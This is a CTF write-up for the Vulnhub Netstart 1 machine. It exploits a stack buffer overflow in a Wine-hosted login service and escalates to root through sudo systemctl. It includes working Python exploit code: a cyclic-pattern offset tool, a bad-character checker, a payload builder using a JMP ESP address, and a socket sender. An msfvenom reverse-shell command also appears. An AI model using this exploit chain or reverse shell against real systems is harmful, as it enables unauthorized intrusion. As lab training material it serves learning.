Vulnhub — Netstart 1 writeup

Guneet Singh
5 min read · Dec 24, 2020

Netstart 1 is a Linux machine on Vulnhub that runs a Windows service under Wine, and that service is vulnerable to a stack-based buffer overflow. In this writeup we will walk through exploiting the overflow step by step and then escalating our privileges to root.

First things first, let's do an nmap scan:

We can see two open ports:

1. 21/tcp (FTP) -> anonymous login is allowed and two files are present: login.exe and login_support.dll

2. 2371/tcp -> running an application called worldwire, which may be vulnerable to a buffer overflow

Let's start with FTP and fetch these two files:

username=anonymous, password=anonymous

Now let's try connecting to port 2371 with netcat:

It asks for a password, so no luck there.

Now let's debug the files we got from FTP. For this I am using a Windows 10 machine.

On running login.exe we can see:

So now let's start Immunity Debugger and attach it to the running login.exe:

(The text in the screenshot is small, sorry about that.)

Now let's fuzz the program and see whether it crashes. For this we will use a Python script that sends progressively larger buffers, as shown below:

The local copy of login.exe listens on the same port as the target, 2371, so we point the fuzzer at the Windows machine on that port.

Now let's find the offset, i.e. how many bytes come before the saved return address. For this we will use Metasploit's pattern tool (msf-pattern_create) to generate a unique cyclic pattern of the crashing length:

Using this pattern we modify our Python script as follows:

Now we can read the four pattern bytes that landed in EIP and feed them to Metasploit's pattern offset tool (msf-pattern_offset) to get the offset:

EIP contains 65433765. Back on Kali Linux we look that value up in the pattern to find the offset (the tool reverses the bytes for us, because the value shown in the register is the little-endian reading of the bytes that sat on the stack):
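The pattern steps above live in screenshots, so here is an added example (my own re-implementation, not the author's script or Metasploit's code) of what the two tools compute. It generates the same `Aa0Aa1...` cyclic pattern and then resolves the EIP value from the crash by packing it little-endian and searching, which is exactly why the bytes look "reversed" compared with the register display. The 65433765 value is taken from the page; the 1702 result is what the pattern arithmetic gives for it and should be confirmed against your own run.

```python
import string
import struct

# Same three character sets, in the same nesting order, as Metasploit's
# pattern_create: upper changes slowest, digit fastest -> "Aa0Aa1Aa2...Aa9Ab0..."
_PERIOD = "".join(
    u + l + d
    for u in string.ascii_uppercase
    for l in string.ascii_lowercase
    for d in string.digits
).encode()  # 26 * 26 * 10 * 3 = 20280 bytes before the sequence repeats


def pattern_create(length: int) -> bytes:
    """Cyclic pattern of `length` bytes, like `msf-pattern_create -l length`."""
    reps = length // len(_PERIOD) + 1
    return (_PERIOD * reps)[:length]


def pattern_offset(eip_hex: str, length: int = len(_PERIOD)) -> int:
    """Offset of the four pattern bytes that ended up in EIP, like `msf-pattern_offset -q`.

    The debugger shows EIP as a number (0x65433765), but x86 is little-endian, so the
    bytes that were on the stack are 65 37 43 65 = b"e7Ce". Pack the value
    little-endian and search for that. Returns -1 when the value is not from the
    pattern at all (for example EIP still holds a real code address and we never
    actually controlled it).
    """
    needle = struct.pack("<I", int(eip_hex, 16))
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(12))          # b'Aa0Aa1Aa2Aa3'
    print(pattern_offset("65433765"))  # 1702 filler bytes before EIP is overwritten
```

Each triplet in the pattern is unique within its 20280-byte period, so a four-byte slice identifies one position; if your crash buffer is longer than one period, trust the first match only after confirming it with the four-B's test described next.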

Now we modify the script to confirm the offset: that many bytes of filler followed by four B's. The script is as follows:

On running the script we get:

EIP now holds 42424242, which is just four B's (0x42) in hex. So we control EIP. Next, let's check for bad characters, if any.

The script used will be:

On executing this script we compare the bytes on the stack with the bytes we sent; any byte that gets altered, or after which the buffer is cut short, is a bad character. \x00 is already left out of the test string because the null terminator is a known bad character.

There don't seem to be any bad characters apart from \x00. Next we need a module with as few memory protections as possible (no ASLR, no rebase, no SafeSEH, no DEP), so that an address inside it is the same every time the service starts; this is where the second file, login_support.dll, comes into play. We use the mona.py plugin's module listing (!mona modules) for this:

We can see that login_support.dll is the least protected module in the list, so we will borrow our jump from it. Now let's search it for JMP ESP (\xff\xe4) instructions, again with mona:

We found two addresses: 0x625012b8 and 0x625012c5.

For this machine we use the first one, 0x625012b8. Note that none of its bytes (b8 12 50 62) is a bad character, which is what makes it usable.

Now let's set a breakpoint at this address in Immunity Debugger and run a Python script that overwrites EIP with it:

The address is written in the script in reverse byte order (\xb8\x12\x50\x62) because x86 is little-endian and this executable is built for 32-bit x86. Running this script we get:

We can see the same address in EIP, so we are 90% done. Now we generate shellcode with msfvenom and output it in C format (-f c). Since the binary runs under Wine, we need a Windows payload, and we pass the bad characters to the encoder with -b:

As a precaution, \x0a and \x0b (line feed and vertical tab), which commonly break network input, are also excluded along with \x00.

Now we use this shellcode against the actual target on port 2371, where the worldwire application is running.

The final exploit script is:

Now start a netcat listener on the port given to msfvenom and run the script:
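The fuzzing, bad-character and final exploit scripts above are all screenshots, so here is one added example (written for this page, not the author's script) that puts the pieces together in Python: the fuzz buffers, the bad-character test string, a compare routine for the stack dump, and the payload layout with the JMP ESP address packed little-endian. The port, the JMP ESP address and the bad characters come from the writeup; the target IP, the 1702 offset (derived from the 0x65433765 EIP value), the CRLF terminator, the password-prompt interaction and the stand-in shellcode are assumptions and must be replaced with your own values and the real msfvenom output.

```python
import socket
import struct

# Values from the writeup; the host is a placeholder to substitute.
HOST = "10.0.0.5"          # assumed target IP
PORT = 2371
JMP_ESP = 0x625012B8       # first JMP ESP mona found in login_support.dll
OFFSET = 1702              # filler bytes before EIP, derived from EIP = 0x65433765
BAD = b"\x00\x0a\x0b"      # \x00 plus the two bytes excluded as a precaution


def fuzz_lengths(start: int = 100, step: int = 100, limit: int = 3000) -> list:
    """Buffers to send one at a time until login.exe crashes in the debugger."""
    return [b"A" * n for n in range(start, limit + 1, step)]


def badchars(exclude: bytes = b"\x00") -> bytes:
    """The bad-character test string: every byte value except the known-bad ones."""
    return bytes(b for b in range(256) if b not in exclude)


def find_badchars(sent: bytes, dumped: bytes) -> list:
    """Compare what we sent with the stack dump the debugger shows after the crash.

    A byte whose value changed in memory is bad; a byte at which the dump simply
    stops truncated the buffer and is bad too (the test uses constructed dumps).
    """
    found = []
    for i, b in enumerate(sent):
        if i >= len(dumped):
            found.append(b)   # everything after this point is gone: a truncating byte
            break
        if dumped[i] != b:
            found.append(b)   # mangled in place
    return found


def build_payload(shellcode: bytes, offset: int = OFFSET,
                  ret: int = JMP_ESP, nops: int = 16) -> bytes:
    """Classic layout: filler up to the saved return address, the JMP ESP address
    packed little-endian (0x625012b8 goes on the wire as b8 12 50 62), a NOP sled
    to absorb a small ESP shift, then the shellcode that ESP points at after the jump."""
    return b"A" * offset + struct.pack("<I", ret) + b"\x90" * nops + shellcode


def check_payload(payload: bytes, bad: bytes = BAD) -> set:
    """Bad bytes present anywhere in the payload; must be empty before sending.
    This also catches a return address that itself contains a bad byte."""
    return {b for b in payload if b in bad}


def exploit(host: str, port: int, payload: bytes) -> None:
    """Connect, consume the password prompt, send the payload. Assumed interaction:
    the overflow is in the password read and the line is terminated with CRLF."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.recv(1024)
        s.sendall(payload + b"\r\n")


if __name__ == "__main__":
    # Stand-in for the msfvenom output; paste the buffer produced by
    # msfvenom -p windows/shell_reverse_tcp LHOST=... LPORT=... -b "\x00\x0a\x0b" -f python
    shellcode = b"\xcc" * 32
    payload = build_payload(shellcode)
    if check_payload(payload):
        raise SystemExit("payload contains bad characters: %r" % check_payload(payload))
    exploit(HOST, PORT, payload)
```

Run the bad-character step before settling on the return address: `check_payload` rejects any buffer that still contains a byte from `BAD`, so a JMP ESP whose address bytes include \x00 or \x0a would be caught here rather than by a silent crash on the target.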

With a shell back, let's find the user flag:

Now that we have the user flag, we try to escalate our privileges. First, check which commands this user is allowed to run through sudo (sudo -l):

/usr/bin/systemctl can be run as root via sudo. Let's check GTFOBins for a known escalation through systemctl (the GTFOBins entry works by writing a service unit whose ExecStart runs your command, then linking and starting it with sudo systemctl, so the command runs as root):

Now let's run that technique and see if we get root:

Congrats!!! We have gained root.

Now let's find the root flag:

Congratulations! You have successfully completed the Netstart 1 machine.
